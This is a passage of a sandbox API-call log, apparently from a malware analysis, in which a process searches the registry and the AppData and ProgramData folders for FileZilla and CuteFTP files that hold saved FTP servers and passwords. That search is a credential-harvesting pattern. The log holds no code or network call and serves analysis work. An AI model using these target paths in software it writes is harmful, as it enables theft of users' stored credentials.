phkResult=0x52d290*=0x0) returned 0x2 [0591.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52d264 | out: phkResult=0x52d264*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52d238 | out: phkResult=0x52d238*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d280 | out: phkResult=0x52d280*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52d254 | out: phkResult=0x52d254*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52d228 | out: phkResult=0x52d228*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d270 | out: phkResult=0x52d270*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52d244 | out: phkResult=0x52d244*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52d218 | out: phkResult=0x52d218*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d260 | out: phkResult=0x52d260*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52d234 | out: phkResult=0x52d234*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52d208 | out: phkResult=0x52d208*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d2b4 | out: phkResult=0x52d2b4*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52d288 | out: phkResult=0x52d288*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52d25c | out: phkResult=0x52d25c*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d2a4 | out: phkResult=0x52d2a4*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52d278 | out: phkResult=0x52d278*=0x0) returned 0x2 [0591.016] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52d24c | out: phkResult=0x52d24c*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d294 | out: phkResult=0x52d294*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52d268 | out: phkResult=0x52d268*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52d23c | out: phkResult=0x52d23c*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d284 | out: phkResult=0x52d284*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52d258 | out: phkResult=0x52d258*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52d22c | out: phkResult=0x52d22c*=0x0) returned 0x2 [0591.017] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", phkResult=0x52d310 | out: phkResult=0x52d310*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e314 | out: phkResult=0x52e314*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2e8 | out: phkResult=0x52e2e8*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2bc | out: phkResult=0x52e2bc*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla Client", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e320 | out: phkResult=0x52e320*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla Client", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2f4 | out: phkResult=0x52e2f4*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\FileZilla Client", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2c8 | out: phkResult=0x52e2c8*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e320 | out: phkResult=0x52e320*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2f4 | out: phkResult=0x52e2f4*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\FileZilla", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2c8 | out: phkResult=0x52e2c8*=0x0) returned 0x2 [0591.017] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\FileZilla Client", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e320 | out: phkResult=0x52e320*=0x0) returned 0x2 [0591.018] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\FileZilla Client", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2f4 | out: phkResult=0x52e2f4*=0x0) returned 0x2 [0591.018] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\FileZilla Client", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2c8 | out: phkResult=0x52e2c8*=0x0) returned 0x2 [0591.018] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.018] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0591.018] lstrlenW (lpString="\\FileZilla") returned 10 [0591.018] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0591.018] LocalAlloc (uFlags=0x40, uBytes=0xd8) returned 0x2ed5140 [0591.018] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.018] lstrlenW (lpString="\\sitemanager.xml") returned 16 [0591.018] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla") returned 43 [0591.018] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x5d7c90 [0591.018] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\sitemanager.xml", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3c [0591.018] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x63f8c8 [0591.018] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\sitemanager.xml", lpDst=0x63f8c8, nSize=0x3c | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 0x3c [0591.018] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\sitemanager.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\filezilla\\sitemanager.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.018] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.018] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\sitemanager.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\filezilla\\sitemanager.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.018] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.018] lstrlenW (lpString="\\recentservers.xml") returned 18 [0591.018] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla") returned 43 [0591.018] LocalAlloc (uFlags=0x40, uBytes=0xfc) returned 0x5d7c90 [0591.018] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\recentservers.xml", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3e [0591.018] LocalAlloc (uFlags=0x40, uBytes=0xfc) returned 0x63f8c8 [0591.018] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\recentservers.xml", lpDst=0x63f8c8, nSize=0x3e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 0x3e [0591.018] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\recentservers.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\filezilla\\recentservers.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.018] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.018] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\recentservers.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\filezilla\\recentservers.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.018] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.018] lstrlenW (lpString="\\filezilla.xml") returned 14 [0591.018] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla") returned 43 [0591.018] LocalAlloc (uFlags=0x40, uBytes=0xf4) returned 0x5d7c90 [0591.018] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\filezilla.xml", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3a [0591.018] LocalAlloc (uFlags=0x40, uBytes=0xf4) returned 0x63f8c8 [0591.018] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\filezilla.xml", lpDst=0x63f8c8, nSize=0x3a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 0x3a [0591.018] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\filezilla.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\filezilla\\filezilla.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.018] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.018] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\FileZilla\\filezilla.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\filezilla\\filezilla.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.019] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.019] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.019] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.019] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0591.019] lstrlenW (lpString="\\FileZilla") returned 10 [0591.019] lstrlenW (lpString="C:\\ProgramData") returned 14 [0591.019] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0x2ed7060 [0591.019] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.019] lstrlenW (lpString="\\sitemanager.xml") returned 16 [0591.019] lstrlenW (lpString="C:\\ProgramData\\FileZilla") returned 24 [0591.019] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x2ed5140 [0591.019] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\FileZilla\\sitemanager.xml", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x29 [0591.019] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x2ed5060 [0591.019] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\FileZilla\\sitemanager.xml", lpDst=0x2ed5060, nSize=0x29 | out: lpDst="C:\\ProgramData\\FileZilla\\sitemanager.xml") returned 0x29 [0591.019] CreateFileW (lpFileName="C:\\ProgramData\\FileZilla\\sitemanager.xml" (normalized: "c:\\programdata\\filezilla\\sitemanager.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.019] LocalFree (hMem=0x2ed5060) returned 0x0 [0591.019] CreateFileW (lpFileName="C:\\ProgramData\\FileZilla\\sitemanager.xml" (normalized: "c:\\programdata\\filezilla\\sitemanager.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.019] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.019] lstrlenW (lpString="\\recentservers.xml") returned 18 [0591.019] lstrlenW (lpString="C:\\ProgramData\\FileZilla") returned 24 [0591.019] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x2ed5140 [0591.019] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\FileZilla\\recentservers.xml", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x2b [0591.019] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x2ed5060 [0591.019] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\FileZilla\\recentservers.xml", lpDst=0x2ed5060, nSize=0x2b | out: lpDst="C:\\ProgramData\\FileZilla\\recentservers.xml") returned 0x2b [0591.019] CreateFileW (lpFileName="C:\\ProgramData\\FileZilla\\recentservers.xml" (normalized: "c:\\programdata\\filezilla\\recentservers.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.019] LocalFree (hMem=0x2ed5060) returned 0x0 [0591.019] CreateFileW (lpFileName="C:\\ProgramData\\FileZilla\\recentservers.xml" (normalized: "c:\\programdata\\filezilla\\recentservers.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.019] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.019] lstrlenW (lpString="\\filezilla.xml") returned 14 [0591.019] lstrlenW (lpString="C:\\ProgramData\\FileZilla") returned 24 [0591.019] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5977a0 [0591.019] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\FileZilla\\filezilla.xml", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x27 [0591.019] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x597878 [0591.019] ExpandEnvironmentStringsW (in: lpSrc="C:\\ProgramData\\FileZilla\\filezilla.xml", lpDst=0x597878, nSize=0x27 | out: lpDst="C:\\ProgramData\\FileZilla\\filezilla.xml") returned 0x27 [0591.019] CreateFileW (lpFileName="C:\\ProgramData\\FileZilla\\filezilla.xml" (normalized: "c:\\programdata\\filezilla\\filezilla.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.019] LocalFree (hMem=0x597878) returned 0x0 [0591.019] CreateFileW (lpFileName="C:\\ProgramData\\FileZilla\\filezilla.xml" (normalized: "c:\\programdata\\filezilla\\filezilla.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.019] LocalFree (hMem=0x5977a0) returned 0x0 [0591.019] LocalFree (hMem=0x2ed7060) returned 0x0 [0591.019] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.019] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0591.020] lstrlenW (lpString="\\FileZilla") returned 10 [0591.020] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0591.020] LocalAlloc (uFlags=0x40, uBytes=0xd4) returned 0x2ed5140 [0591.020] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.020] lstrlenW (lpString="\\sitemanager.xml") returned 16 [0591.020] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla") returned 41 [0591.020] LocalAlloc (uFlags=0x40, uBytes=0xf4) returned 0x5d7c90 [0591.020] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\sitemanager.xml", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3a [0591.020] LocalAlloc (uFlags=0x40, uBytes=0xf4) returned 0x63f8c8 [0591.020] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\sitemanager.xml", lpDst=0x63f8c8, nSize=0x3a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\sitemanager.xml") returned 0x3a [0591.020] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\sitemanager.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\filezilla\\sitemanager.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.020] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.020] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\sitemanager.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\filezilla\\sitemanager.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.020] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.020] lstrlenW (lpString="\\recentservers.xml") returned 18 [0591.020] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla") returned 41 [0591.020] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x5d7c90 [0591.020] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\recentservers.xml", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3c [0591.020] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x63f8c8 [0591.020] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\recentservers.xml", lpDst=0x63f8c8, nSize=0x3c | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\recentservers.xml") returned 0x3c [0591.020] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\recentservers.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\filezilla\\recentservers.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.020] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.020] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\recentservers.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\filezilla\\recentservers.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.020] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.020] lstrlenW (lpString="\\filezilla.xml") returned 14 [0591.020] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla") returned 41 [0591.020] LocalAlloc (uFlags=0x40, uBytes=0xf0) returned 0x5e6f98 [0591.020] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\filezilla.xml", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x38 [0591.020] LocalAlloc (uFlags=0x40, uBytes=0xf0) returned 0x59f8b0 [0591.020] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\filezilla.xml", lpDst=0x59f8b0, nSize=0x38 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\filezilla.xml") returned 0x38 [0591.020] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\filezilla.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\filezilla\\filezilla.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.020] LocalFree (hMem=0x59f8b0) returned 0x0 [0591.020] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\FileZilla\\filezilla.xml" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\filezilla\\filezilla.xml"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.020] LocalFree (hMem=0x5e6f98) returned 0x0 [0591.020] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.020] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0591.020] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0591.020] lstrlenW (lpString="\\GlobalSCAPE\\CuteFTP") returned 20 [0591.020] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0591.020] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5e6f98 [0591.020] lstrlenW (lpString="\\sm.dat") returned 7 [0591.021] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP") returned 53 [0591.021] LocalAlloc (uFlags=0x40, uBytes=0xfa) returned 0x5d7c90 [0591.021] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3d [0591.021] LocalAlloc (uFlags=0x40, uBytes=0xfa) returned 0x63fb60 [0591.021] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP\\sm.dat", lpDst=0x63fb60, nSize=0x3d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP\\sm.dat") returned 0x3d [0591.021] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\globalscape\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.021] LocalFree (hMem=0x63fb60) returned 0x0 [0591.021] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\globalscape\\cuteftp\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.021] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.021] lstrlenW (lpString="\\*.*") returned 4 [0591.021] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP") returned 53 [0591.021] LocalAlloc (uFlags=0x40, uBytes=0xf4) returned 0x5d7c90 [0591.021] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP\\*.*", lpFindFileData=0x52e0a8 | out: lpFindFileData=0x52e0a8) returned 0xffffffff [0591.021] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.021] LocalFree (hMem=0x5e6f98) returned 0x0 [0591.021] lstrlenW (lpString="\\GlobalSCAPE\\CuteFTP Pro") returned 24 [0591.021] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0591.021] LocalAlloc (uFlags=0x40, uBytes=0xf4) returned 0x5d7c90 [0591.021] lstrlenW (lpString="\\sm.dat") returned 7 [0591.021] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Pro") returned 57 [0591.021] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed570 [0591.021] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Pro\\sm.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x41 [0591.021] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5ed688 [0591.021] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Pro\\sm.dat", lpDst=0x5ed688, nSize=0x41 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Pro\\sm.dat") returned 0x41 [0591.021] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Pro\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\globalscape\\cuteftp pro\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0591.021] LocalFree (hMem=0x5ed688) returned 0x0 [0591.021] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP Pro\\sm.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\globalscape\\cuteftp pro\\sm.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 